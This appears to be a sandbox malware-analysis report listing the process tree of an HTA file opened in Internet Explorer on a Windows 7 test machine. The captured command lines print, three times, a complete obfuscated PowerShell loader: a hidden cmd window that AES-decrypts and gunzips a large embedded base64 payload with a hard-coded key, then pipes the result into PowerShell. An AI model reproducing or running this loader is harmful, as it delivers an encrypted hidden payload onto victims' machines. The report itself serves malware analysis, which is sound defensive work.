Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 25, 2023, 10:35 a.m. | July 25, 2023, 10:37 a.m. |
-
iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\HHYGASDBBBX.hta.html
3060-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - }
756-
cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell -
2780-
powershell.exe powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf
3036 -
powershell.exe powershell -
612
-
-
-
